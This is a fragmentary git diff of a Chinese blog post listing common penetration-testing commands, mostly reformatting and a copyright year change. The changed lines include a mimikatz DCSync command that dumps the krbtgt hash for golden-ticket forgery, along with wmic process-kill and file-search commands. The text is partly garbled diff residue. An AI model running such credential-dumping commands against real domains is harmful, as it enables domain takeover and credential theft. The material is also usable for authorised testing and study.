渗透常用小命令
始
- - -始
@@ -346,7 +330,7 @@E-Maker
-© 2022 E-Maker
+© 2025 E-Maker
diff --git "a/2021/06/12/\346\270\227\351\200\217\345\270\270\347\224\250\345\260\217\345\221\275\344\273\244/index.html" "b/2021/06/12/\346\270\227\351\200\217\345\270\270\347\224\250\345\260\217\345\221\275\344\273\244/index.html" index 35e89fe..cc15bec 100644 --- "a/2021/06/12/\346\270\227\351\200\217\345\270\270\347\224\250\345\260\217\345\221\275\344\273\244/index.html" +++ "b/2021/06/12/\346\270\227\351\200\217\345\270\270\347\224\250\345\260\217\345\221\275\344\273\244/index.html" @@ -8,7 +8,7 @@ - + @@ -45,7 +45,7 @@
黄金票据
查看krbtgt相关信息
-mimikatz lsadump::dcsync /domain:de1ay.com /user:krbtgt需要的信息
+mimikatz lsadump::dcsync /domain:de1ay.com /user:krbtgt
+
+需要的信息
- 域内用户
- 该用户的域sid
- 域名
@@ -328,9 +330,10 @@
1
wmic process where pid="123" delete
- 全盘搜索文件
-1
for /f "skip=1 tokens=1*" %i in ('wmic datafile where "FileName='qq' and extension='exe'" get drive^,path') do (set "qPath=%i%j"&@echo %qPath:~0,-3%)
-
-windows at
+1
for /f "skip=1 tokens=1*" %i in ('wmic datafile where "FileName='qq' and extension='exe'" get drive^,path') do (set "qPath=%i%j"&@echo %qPath:~0,-3%)
+
+
+windows at
- 查看远程主机时间
1
net time \\ip
@@ -381,7 +384,9 @@ windows(netsh)
mimikatz lsadump::dcsync /domain:de1ay.com /user:krbtgt需要的信息
mimikatz lsadump::dcsync /domain:de1ay.com /user:krbtgt1 | wmic process where pid="123" delete |
---
1 for /f "skip=1 tokens=1*" %i in ('wmic datafile where "FileName='qq' and extension='exe'" get drive^,path') do (set "qPath=%i%j"&@echo %qPath:~0,-3%)
windows at
1 | for /f "skip=1 tokens=1*" %i in ('wmic datafile where "FileName='qq' and extension='exe'" get drive^,path') do (set "qPath=%i%j"&@echo %qPath:~0,-3%) |
1 net time \\ip





